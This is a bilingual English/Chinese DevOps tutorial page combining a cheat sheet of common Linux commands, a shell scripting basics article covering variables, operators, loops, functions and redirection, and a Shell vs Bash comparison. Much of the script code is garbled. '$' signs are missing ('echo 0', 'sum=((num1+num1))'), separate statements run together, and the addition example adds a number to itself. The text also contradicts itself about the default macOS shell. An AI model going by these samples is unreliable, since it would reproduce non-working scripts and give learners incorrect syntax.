I. Connectivity & remote management
一、连接与远程管理
The first step is to reach a server.
操作的第一步是连接服务器。
1. ssh - Secure shell access
1. ssh --- 安全远程 shell 访问
Use it to execute remote commands without opening a full interactive shell to speed up automation.
可执行远程命令而无需开启完整交互式 shell,提升自动化效率。
ssh user@prod-server # Standard login
ssh -i ~/.ssh/id_rsa user@host # Login using a specific private key (-i specifies the private key file for authentication)
ssh user@host "df -h" # Execute command and return result immediately
2. scp - Secure Copy
2. scp --- 安全文件传输
Moving files between your local machine and a cluster. Warning: scp overwrites without confirmation---always verify the destination first.
用于本地与集群间的文件传输。警告: scp 覆盖文件无确认提示,执行前务必校验目标路径。
scp ./nginx.conf user@host:/etc/nginx/ # Push local config to server
scp -r user@host:/var/log/app/ ./logs/ # Pull remote log directory to local (-r copies directories recursively)
scp -p user@host:/file ./local/ # -p preserves permissions (safer for configs)
II. Filesystem Navigation & Cleanup
二、文件系统导航与清理
3. ls & pwd - List Files and Show Location
3. ls 与 pwd --- 文件列表与路径查看
ls -la is the industry standard to see hidden files (like .env or .git). Know where you are with pwd.
ls -la 是查看隐藏文件(如 .env、.git)的行业标准用法,pwd 用于查看当前路径。
ls -la # detailed listing with hidden files
ls -lh # readable file sizes (KB, MB, etc)
ls -lt # sorted by modification time
pwd # show current directory path
pwd -P # show physical path (resolves symlinks) --- reveals where you really are
4. cd - Change Directory
4. cd --- 切换目录
cd /var/log # absolute path
cd ../config # relative path - go up one level
cd - # toggle between your current and previous directory
5. find - Locating Files
5. find --- 文件查找
find / -type f -name "*.conf" # Find every config file on the system
find . -type f -mtime -1 # Find files modified in the last 24 hours
find /var/log -type f -size +100M # Find large files taking up space
6. mkdir - Create Directories
6. mkdir --- 创建目录
Use mkdir -p path/to/dir to create a full nested directory tree in one go.
使用 mkdir -p path/to/dir 可一次性创建完整嵌套目录。
mkdir /var/backups/daily # Create a single directory
mkdir -p /var/app/logs/archive # Create nested directories
7. rm - Remove Files
7. rm --- 删除文件
Warning: Always use ls with your wildcards before running rm to ensure you aren't deleting more than intended.
**警告:**执行 rm 前先用 ls 配合通配符校验,避免误删过量文件。
rm /tmp/old_file.txt # Delete a single file
find /var/log -type f -name "*.old" -delete # Find and delete old log files
III. System Observability & Troubleshooting
三、系统可观测性与故障排查
When "the site is down," these are the tools you use to find the bottleneck.
当服务不可用时,以下工具可用于定位瓶颈。
8. top - Process Monitoring
8. top --- 进程监控
Real-time view of CPU, Memory, and Load Average.
实时查看 CPU、内存与系统平均负载。
top # Standard system monitor
9. ps - Process Status
9. ps --- 进程状态查看
Find specific process IDs (PIDs).
查找指定进程 ID(PID)。
ps aux | grep python # Find all running Python scripts
ps -ef --forest # Visualize process hierarchy (who spawned what) --- reveals dependencies
10. df & du - Disk Usage
10. df 与 du --- 磁盘占用查看
"Disk Full" is a leading cause of database failures.
磁盘空间耗尽是数据库故障的主要诱因之一。
df -h # Human-readable disk space per partition
du -sh /var/log/* | sort -hr # Find the largest files in the log directory
11. journalctl - Systemd logs
11. journalctl --- Systemd 日志查看
The modern way to view logs for services managed by systemd. Use time filters to scope logs for faster debugging.
查看 systemd 管理服务日志的现代方式,通过时间筛选缩小日志范围,加快调试效率。
journalctl -u docker.service -f # Follow logs for the Docker daemon
journalctl --since "10 min ago" # Scope to recent events (huge time saver)
journalctl -u nginx --since "1 hour ago" # Combine unit and time filters
IV. Log Parsing & Text Manipulation
四、日志解析与文本处理
DevOps is also about reading logs.
DevOps 工作包含大量日志阅读操作。
12. tail & head - File ends
12. tail 与 head --- 文件首尾查看
tail -f /var/log/nginx/access.log # Stream logs in real-time
tail -n 100 error.log # View the last 100 lines
head -20 config.txt # View first 20 lines of a file
13. grep - Pattern Matching
13. grep --- 模式匹配
grep -i "error" app.log # Case-insensitive search
grep -r "127.0.0.1" /etc/nginx/ # Recursive search through all config files
grep -c "warning" system.log # Count matching lines
14. cat & less - File Reading
14. cat 与 less --- 文件阅读
Use cat for small files and less for massive logs to avoid "bombing" your terminal.
小文件使用 cat,大型日志使用 less,避免终端输出溢出。
cat /etc/resolv.conf # Quick check of DNS settings
less /var/log/syslog # Searchable, scrollable view (Press 'q' to quit)
V. Service & Permissions Control
五、服务与权限管理
Managing the lifecycle of applications and securing the filesystem.
管理应用生命周期与文件系统安全。
15. systemctl - Service Manager
15. systemctl --- 服务管理
sudo systemctl restart nginx # Restart a service after config change
sudo systemctl status kubelet # Check if Kubernetes agent is healthy
sudo systemctl enable prometheus # Ensure service starts on boot
16. sudo - Elevated privileges
16. sudo --- 权限提升
Run commands with root-level access when needed.
按需以 root 权限执行命令。
sudo command # Execute with root privileges
sudo !! # Repeat the last command as sudo
17. chmod & chown - Permissions
17. chmod 与 chown --- 权限配置
Warning: Never use chmod 777 as a quick fix---it's a security disaster. Use specific permissions.
**警告:**切勿使用 chmod 777 临时解决问题,此举存在严重安全隐患,应采用精准权限配置。
chmod 400 private_key.pem # Secure a private key (Read-only for owner)
chown -R www-data:www-data /var/www # Change directory ownership to web server user
chmod 755 /var/app/script.sh # Owner: rwx, Others: rx (scripts)
chmod 640 config.conf # Owner: rw, Group: r, Others: nothing (sensitive)
18. kill - Terminate processes
18. kill --- 进程终止
Best practice: Use SIGTERM first to let the process clean up gracefully. Only force-kill if it refuses.
**最佳实践:**优先使用 SIGTERM 让进程优雅退出,仅在进程无响应时强制终止。
kill -15 <PID> # SIGTERM: Ask nicely to shut down
sleep 5
kill -9 <PID> # SIGKILL: Force immediate stop (only if needed)
killall nginx # Kill all processes with a given name
VI. Network & API testing
六、网络与 API 测试
Validating that services are actually listening and responding.
校验服务是否正常监听与响应。
19. curl - The Swiss Army Knife of HTTP
19. curl --- HTTP 操作全能工具
curl -I https://google.com # Fetch headers only (-I shows response headers; great for checking status codes)
curl -X POST -d @data.json http://api # Send JSON data to an endpoint (-X specifies HTTP method; -d sends data)
curl -H "Authorization: Bearer token" https://api.example.com # Add custom headers (-H adds custom HTTP header, like auth tokens)
20. netstat / ss - Socket Statistics
20. netstat / ss --- 套接字统计
Check if a port is actually open and listening.
校验端口是否开放并处于监听状态。
ss -tulpn | grep :80 # See what process is using port 80
netstat -an | grep ESTABLISHED # View all active connections
Automate Everything: Shell Scripting Fundamentals for DevOps
全流程自动化:DevOps Shell 脚本基础
Learn the most important shell scripting concepts.
掌握 Shell 脚本编程概念
Karthik S Patil
Jan 25, 2026
Introduction
引言
Shell scripting is one of the core skills for any DevOps engineer. It allows automation of repetitive tasks, system administration, monitoring, deployments, and integration with cloud and CI/CD tools.
Shell 脚本编程是 DevOps 工程师的核心技能之一,可实现重复任务自动化、系统管理、监控、部署,以及与云服务和 CI/CD 工具集成。
This article covers the must-know shell scripting concepts required to crack a DevOps trainee / associate / junior DevOps engineer role.
本文涵盖 DevOps 实习生、初级工程师岗位所需掌握的 Shell 脚本核心概念。
What is a shell?
什么是 Shell?
A shell is a command-line interface (CLI) that acts as a bridge between the user and the operating system.
Shell 是一种命令行界面(CLI),作为用户与操作系统之间的交互桥梁。
Why is it Called a "Shell"?
为何命名为"Shell"?
- The kernel is the part of the operating system
内核是操作系统的组成部分 - The shell surrounds the kernel and provides a way for users to interact with it that's why it's called a shell --- it wraps around the kernel.
Shell 包裹内核并提供用户交互方式,因此得名 Shell,意为包裹内核的外层。
How a Shell Works
Shell 工作原理
- You type a command (for example:
ls)
用户输入命令(如ls) - The shell interprets the command
Shell 解析命令 - The shell asks the OS (kernel) to execute it
Shell 请求操作系统(内核)执行命令 - The result is displayed back to you
执行结果返回至用户终端
Types of Shells:
Shell 分类:
Shells are broadly classified into Graphical User Interface (GUI) shells and Command Line Interface (CLI) shells, based on how users interact with the operating system.
根据用户与操作系统的交互方式,Shell 分为图形用户界面(GUI)Shell 与命令行界面(CLI)Shell。
Graphical User Interface (GUI) Shell
图形用户界面(GUI)Shell
A GUI shell allows users to interact with the system using windows, icons, menus, buttons, and a mouse, instead of typing commands.
GUI Shell 允许用户通过窗口、图标、菜单、按钮与鼠标操作系统,无需输入命令。
Examples:
示例:
-
Linux: GNOME
Linux 系统:GNOME -
Windows: Windows Explorer (Windows Shell), Windows Desktop Environment
Windows 系统:文件资源管理器(Windows Shell)、桌面环境 -
Apple (macOS): Finder
Apple(macOS)系统:访达 -
GUI shells are user-friendly and commonly used on desktops but are rarely used on servers.
GUI Shell 操作友好,常用于桌面环境,服务器场景极少使用。Command to know which GUI shell is being used
echo $XDG_CURRENT_DESKTOP
Command Line Interface (CLI) Shell
命令行界面(CLI)Shell
A CLI shell allows users to interact with the operating system by typing text-based commands through a terminal.
CLI Shell 允许用户通过终端输入文本命令与操作系统交互。
Examples:
示例:
- Linux: bash (Bourne Again Shell), sh (Bourne Shell)
Linux 系统:bash(Bourne Again Shell)、sh(Bourne Shell) - Windows: command Prompt, powerShell
Windows 系统:命令提示符、PowerShell - Apple (macOS): zsh (default shell), terminal
Apple(macOS)系统:zsh(默认 Shell)、终端 - CLI shells are powerful, fast, and heavily used by system administrators and DevOps engineers.
CLI Shell 高效快捷,被系统管理员与 DevOps 工程师广泛使用。
Types of Linux shells:
Linux 系统 Shell 种类:
i. sh (Bourne Shell): The original Unix shell that provides basic command execution and scripting features. It is lightweight and mainly used for compatibility and simple scripts.
sh(Bourne Shell): 类 Unix 系统原始 Shell,提供基础命令执行与脚本功能,轻量高效,主要用于兼容场景与简单脚本。
ii. bash (Bourne Again Shell): An enhanced version of sh with features like command history, auto-completion, and job control. It is the default shell in most Linux distributions.
bash(Bourne Again Shell): sh 的增强版本,具备命令历史、自动补全、任务控制等功能,为多数 Linux 发行版默认 Shell。
iii. zsh (Z Shell): An advanced shell with powerful auto-completion, spelling correction, and theming support. It is popular among developers for its productivity features.
zsh(Z Shell): 高级 Shell,具备强大的自动补全、拼写纠错与主题支持,因提升开发效率深受开发者青睐。
iv. ksh (Korn Shell): Combines features of sh and csh with strong scripting capabilities. It is commonly used in enterprise and legacy Unix systems.
ksh(Korn Shell): 融合 sh 与 csh 特性,脚本能力突出,常用于企业级与传统类 Unix 系统。
v. csh (C Shell): Uses C-language-like syntax and provides built-in job control. It is less popular today due to scripting limitations.
csh(C Shell): 语法类似 C 语言,内置任务控制功能,因脚本编写限制现已较少使用。
vi. fish (Friendly Interactive Shell): Designed for ease of use with smart suggestions and syntax highlighting. It focuses more on interactivity than scripting compatibility.
fish(友好交互式 Shell): 易用性设计,具备智能提示与语法高亮,侧重交互体验而非脚本兼容性。
Commands to know about Shell:
Shell 相关查询命令:
- echo 0 -\> Shows the name of the shell currently in use. echo 0 -> 显示当前使用的 Shell 名称。
- cat /etc/shells -> Lists all the shells available and installed on the Linux system.
cat /etc/shells -> 列出 Linux 系统已安装的所有 Shell。 - echo SHELL -\> Displays the default shell path assigned to the current user. echo SHELL -> 显示当前用户默认 Shell 路径。
What is Shell Scripting?
什么是 Shell 脚本编程?
- It is an executable file containing several shell commands that executes sequentially.
可执行文件,包含多条按顺序执行的 Shell 命令。 - ".sh" is the extension for shell script files.
Shell 脚本文件后缀为.sh。
Steps to Create and Run a Shell Script File:
Shell 脚本创建与执行步骤:
Press enter or click to view image in full size
按回车或点击查看完整图片
Note:
--> File will execute from left to right
--> Top to Bottom
--> Line by Line
What is a Variable?
什么是变量?
A variable is a named memory location used to store data that can be accessed and modified during script execution.
变量是具名内存空间,用于存储脚本执行过程中可读写的数据。
Declaring and Assigning a Variable:
变量声明与赋值:
syntax: declare_variable=assign_value #example: name="Devops"
Accessing a Variable:
变量调用:
Use $ before the variable name to access its value.
#example: echo $name
Taking Input from the User:
用户输入接收:
The read command is used to take input from the user and store it in a variable.
#example: read username
Example Script: User Input and Variable Access:
脚本示例:用户输入与变量调用:
#!/bin/bash
echo "Enter your name:" #Devops
read name
echo "Welcome $name"
o/p -> Welcome Devops
What are Operators?
什么是运算符?
Operators are symbols used to perform operations on variables and values.
运算符是用于对变量与数值执行操作的符号。
Types of Operators:
运算符分类:
- Arithmetic Operators: Used to perform mathematical calculations.
算术运算符: 用于数学计算。
-
(+) Addition
(+) 加法 -
(-) Subtraction
(-) 减法 -
() Multiplication
() 乘法 -
(/) Division
(/) 除法 -
(%) Modulus
(%) 取模#!/bin/bash
echo enter the first value
read num1
echo enter the second value
read num2sum=((num1+num1)) #Addition sub=((num1-num2)) #Subtraction
prod=((num1*num2)) #Multiplication div=((num1/num2)) #Division
mod=$((num1%num2)) #Modulusecho Add:sum echo Sub:sub
echo Mul:prod echo Div:div
echo Mod:$mod
- Relational Operators: Used to compare two numeric values.
关系运算符: 用于数值比较。
-
(-eq or ==) Equal
(-eq 或 ==) 等于 -
(-ne or !=) Not Equal
(-ne 或 !=) 不等于 -
(-gt or >) Greater than
(-gt 或 >) 大于 -
(-lt or <) Less than
(-lt 或 <) 小于 -
(-ge or >=) Greater than / Equal to
(-ge 或 >=) 大于等于 -
(-le or <=) Less than / Equal to
(-le 或 <=) 小于等于#!/bin/bash
echo enter the first value
read a
echo enter the second value
read becho "a==b":((a==b)) #Equals echo "a!=b":((a!=b)) #Not Equals
echo "a>b":((a>b)) #Greater than echo "a((a<b)) #Lesser than
echo "a>=b":((a>=b)) #Greater than or Equal to echo "a<=b":((a<=b)) #Lesser than or Equal to
- Logical Operators: It will check the condition and compare the value and return true or false.
逻辑运算符: 校验条件并比较数值,返回布尔结果。
-
(-a or &&) AND - True if both conditions are true
(-a 或 &&) 与 - 两条件均为真时结果为真 -
(-o or ||) OR - True if any one condition is true
(-o 或 ||) 或 - 任一条件为真时结果为真 -
(!) NOT - True if the condition is false
(!) 非 - 条件为假时结果为真#!/bin/bash
echo enter the first binary value
read a
echo enter the second binary value
read becho "a AND b":((a&&b)) #logical AND echo "a OR":((a||b)) #logical OR
echo "NOT a":((!a)) #logical NOT echo "NOT b":((!b)) #logical NOT
What are Conditional Statements?
什么是条件语句?
It is used to execute code blocks on whether conditions evaluate to true or false.
根据条件真假执行对应代码块。
Types:
分类:
-
if Statement: Executes a block of code when a condition is true.
if 语句: 条件为真时执行代码块。#!/bin/bash if [ $a -gt 10 ] then echo "A is greater than 10" fi -
if--else Statement: Executes one block if the condition is true and another if it is false.
if--else 语句: 条件为真执行一段代码,为假执行另一段代码。#!/bin/bash if [ $a -gt 10 ] then echo "A is greater than 10" else echo "A is less than or equal to 10" fi -
elif Statement: Used to check multiple conditions sequentially.
elif 语句: 依次校验多个条件。#!/bin/bash if [ $a -gt 10 ] then echo "A is greater than 10" elif [ $a -eq 10 ] then echo "A is equal to 10" else echo "A is less than 10" fi -
Nested if Statement: An if statement inside another if statement is called a nested if.
嵌套 if 语句: if 语句内部包含另一个 if 语句,称为嵌套 if。#!/bin/bash if [ $a -gt 0 ] then if [ $a -lt 100 ] then echo "A is between 1 and 99" fi fi
- String Operators:
- 字符串运算符:
-
=: Checks if two strings are equal
=:判断两字符串相等 -
!=: Checks if two strings are not equal
!=:判断两字符串不相等 -
-z: Checks if a string is null (empty)
-z:判断字符串为空 -
-n: Checks if a string is not null
-n:判断字符串非空#!/bin/bash
str1="DevOps"
str2="Linux"Check if strings are equal
if [ "str1" = "str2" ]; then
echo "str1 is equal to str2"
else
echo "str1 is not equal to str2"
fi
- File Test Operators:
- 文件测试运算符:
-
-e: Checks if a file or directory exists
-e:判断文件或目录存在 -
-f: Checks if a file exists and is a regular file
-f:判断文件存在且为普通文件 -
-d: Checks if a directory exists
-d:判断目录存在 -
-r: Checks if a file is readable
-r:判断文件可读 -
-w: Checks if a file is writable
-w:判断文件可写 -
-x: Checks if a file is executable
-x:判断文件可执行 -
-s: Checks if a file is not empty (size > 0)
-s:判断文件非空(大小大于 0)#!/bin/bash
echo "Enter the file path:"
read filepathCheck if file exists
if [ -e "$filepath" ]; then
echo "File exists"
else
echo "File does not exist"
fi
Looping Statements:
循环语句:
Looping statements are used to execute a block of code repeatedly until a certain condition is met.
循环语句用于重复执行代码块,直至满足终止条件。
-
for Loop: Executes a block of code for each item in a list or range.
for 循环: 对列表或范围内的每个元素执行代码块。syntax:
语法:
for variable in list
do
commands
done
#!/bin/bash for i in 1 2 3 4 5 do echo "Iteration $i" done -------------------- for((i=1;i<=5;i++)) do echo "Number $i" done -
while Loop: Executes a block of code repeatedly while a condition is true.
while 循环: 条件为真时重复执行代码块。Syntax:
语法:
while [ condition ]
do
commands
done
#!/bin/bash count=1 while [ $count -le 5 ] do echo "Count is $count" ((count++)) done -
until Loop: Executes a block of code repeatedly until a condition becomes true.
until 循环: 重复执行代码块直至条件为真。Syntax:
语法:
until [ condition ]
do
commands
done
#!/bin/bash count=1 until [ $count -gt 5 ] do echo "Count is $count" ((count++)) done -
Nested Loops: A loop inside another loop is called a nested loop.
嵌套循环: 循环内部包含另一个循环,称为嵌套循环。#!/bin/bash
for i in 1 2 3
do
for j in a b c
do
echo "i - j"
done
done
Functions:
函数:
- It allows you to group commands together into single unit & reuse them throughout your script.
- 可将多条命令封装为单元,在脚本中复用。
- This can make scripts more organized, readable and maintainable.
- 提升脚本结构化程度、可读性与可维护性。
Declaring a Function:
函数声明:
Syntax1: function function_name {
commands
}
Syntax2: function_name() {
commands
}
----------------------------------
#!/bin/bash
greet() {
echo "Hello, DevOps!"
}
# call function:
greet
o/p: Hello, DevOps!
Function Variables Scope:
函数变量作用域:
-
Variables are declared into local and global variables
变量分为局部变量与全局变量 -
Variables declared in a script by default is called global variables
脚本中直接声明的变量为全局变量 -
Variable declared directly in function block it is also referred as global variable
函数内直接声明的变量同样为全局变量 -
Variable declared with local keyword is called local variable
使用 local 关键字声明的变量为局部变量#!/bin/bash
global_var="I am global"
myfunc() {
local local_var="I am local"
echo global_var echo local_var
}myfunc
echo global_var echo local_var #Will give blank because local_var is not accessible outsideo/p:
I am global
I am local
I am global
# blank (local_var is not accessible here)
Passing Arguments to a Function:
函数参数传递:
-
Arguments passed to a function are accessed by using 1, 2, etc.
函数参数通过 1、2 等形式调用。 -
It is just like script arguments.
用法与脚本参数一致。#!/bin/bash
sum() {
echo "Sum: ((1 + $2))"
}sum 10 20
o/p: sum: 30
Returning Values from a Function:
函数返回值:
-
Shell functions can return values using the "return" command
Shell 函数可通过 return 命令返回值
-
It will return number only from range " 0 to 255 ".
仅可返回 0 至 255 范围内的数值。
#!/bin/bash square() {``` echo $(($1 * $1)) } result=$(square 5) echo "Square is $result" o/p: Square is 25
Redirections:
重定向:
Redirection is the process of sending the output of a command to a file or another command instead of the terminal.
重定向是将命令输出发送至文件或其他命令,而非终端的操作。
Output Redirection:
输出重定向:
1. >
What it does: Sends command output to a file and replaces old content.
作用:将命令输出写入文件并覆盖原有内容。
Example:
echo "Hello" > file.txt #file.txt will contain only Hello
2. >>
What it does: Sends command output to a file and adds it at the end.
作用:将命令输出追加至文件末尾。
Example:
echo "World" >> file.txt #file.txt will now have Hello and World
Error Redirection:
错误重定向:
1. 2>
What it does: Saves error messages into a file
作用:将错误信息写入文件。
Example:
ls wrongfile 2> error.txt #Error message goes into error.txt,not on screen
2. 2>>
What it does: Adds error messages to a file without deleting old errors
作用:将错误信息追加至文件,不覆盖原有内容。
Example:
ls anotherwrongfile 2>> error.txt #New error is added to error.txt
Input Redirection:
输入重定向:
1. <
What it does: Read input from a file instead of keyboard
作用:从文件读取输入,而非键盘。
Example:
sort < names.txt #Reads names.txt and prints the sorted names
To Redirect both Output and Error :
输出与错误同时重定向:
1. &>
What it does: Saves both output and error into one file
作用:将标准输出与错误输出写入同一文件。
Example:
ls file1 wrongfile &> all.txt #Both success output & error go into all.txt
Note: We are having special file in Linux - /dev/null
What it does: Throws away all the output
注:Linux 中存在特殊文件 /dev/null,作用为丢弃所有输出。
Example:
ls > /dev/null #ls runs, but you see nothing on the screen.
Subshell:
子 Shell:
A Subshell is a child shell that runs a group of commands in isolation from the current shell.
子 Shell 是独立于当前 Shell 运行一组命令的子进程。
Key Points
要点:
-
Created using parentheses ()
通过括号
()创建 -
Useful for isolating commands
用于命令隔离
-
Changes inside the subshell do not affect the main shell
子 Shell 内的修改不影响主 Shell
#!/bin/bash var="Parent" echo "Before subshell: $var" ( var="Child" echo "Inside subshell: $var" ) echo "After subshell: $var"
Command Substitution:
命令替换:
Command substitution allows you to use the output of a command as a value for a variable or directly in a command.
命令替换可将命令输出作为变量值或直接用于命令中。
Syntax: $(): $(command)
语法:$():$(command)
#!/bin/bash
# Using $()
current_date=$(date)
echo "Today is $current_date"
Note:
注:
| Syntax | Purpose 作用 |
|---|---|
if command ; then |
To check if a command is successful 判断命令是否执行成功 |
() |
Subshell 子 Shell |
$() |
Command substitution 命令替换 |
$(( )) |
Arithmetic operators 算术运算 |
[] or [[]] |
Logical operators 逻辑运算 |
Conclusion:
总结:
Shell scripting is an essential skill for DevOps engineers to automate system tasks and improve efficiency. It is widely used for system administration, monitoring, backups, and CI/CD automation.
Shell 脚本编程是 DevOps 工程师实现系统任务自动化、提升工作效率的必备技能,广泛应用于系统管理、监控、备份与 CI/CD 自动化。
Learning core concepts like variables, conditions, loops, and functions builds a strong scripting foundation. Mastering shell scripting helps reduce manual effort and prepares candidates for real-world DevOps roles.
掌握变量、条件、循环、函数等核心概念可构建扎实的脚本编程基础。熟练运用 Shell 脚本能够减少人工操作,适配实际 DevOps 岗位需求。
Shell 与 Bash 的区别
1. Shell vs Bash
Shell 是一类程序的统称;Bash 是其中最流行、最常用的一种具体实现。
- Shell = 总称(界面/命令解释器)
- Bash = 具体的软件(最主流的 Shell)
2. 正式定义
Shell(壳)
- 是用户与操作系统内核交互的命令行界面
- 负责接收命令 → 传给内核 → 显示结果
- 是一个类别,不是单个程序
Bash(Bourne-Again Shell)
- 是 Shell 的一种具体实现
- 是
sh的增强升级版 - 是 Linux/macOS 默认 Shell
- 功能最强、兼容性最好、最常用
3. 包含关系
Shell(总称)
├── sh (Bourne Shell)
├── Bash (Bourne-Again Shell) ✅ 最主流
├── zsh
├── ksh
├── csh / tcsh
└── fish
Bash ⊂ Shell
Bash 属于 Shell,但 Shell 不只有 Bash。
4. 功能区别
| 特性 | Shell(泛指) | Bash(具体) |
|---|---|---|
| 定位 | 命令解释器 | 强化版命令解释器 |
| 兼容性 | 基础标准 | 完全兼容 sh |
| 命令补全 | 无 | 有 |
| 历史记录 | 弱 | 强 |
| 脚本功能 | 基础 | 强大 |
| 默认使用 | 不一定 | Linux 全系默认 |
5. 实际工作中区分
bash
#!/bin/sh
→ 用的是 标准 Shell,功能少、严格、兼容性极高
bash
#!/bin/bash
→ 用的是 Bash,功能强、日常开发 99% 用这个
6. 简单记忆
- Shell = 命令行界面的统称
- Bash = 现在 Linux 里默认的那个 Shell
Reference
-
What Is a Shell? A complete, modern guide for developers, DevOps engineers and curious power-users.
https://www.cyber8200.com/en/blog/what-is-shell#72--system-administration -
Bash Like an Engineer: Smarter Scripting for DevOps · DSTW Notes
https://dstw.github.io/2025/05/29/bash-for-devops/ -
20 essential shell commands for DevOps engineers
https://christosmonogios.com/2026/02/28/20-essential-shell-commands-for-devops-engineers/ -
Automate Everything: Shell Scripting Fundamentals for DevOps | 2026
https://karthik-s-patil.medium.com/shell-scripting-essentials-for-devops-engineers-97c9500d8cd0
-
Using Bash Scripts for DevOps Automation: A Comprehensive Guide - DevopsRoles.com Better 2026
https://www.devopsroles.com/using-bash-scripts-for-devops-automation/ -
How to Learn Linux Shell Scripting for DevOps?
https://devopscube.com/linux-shell-scripting-for-devops/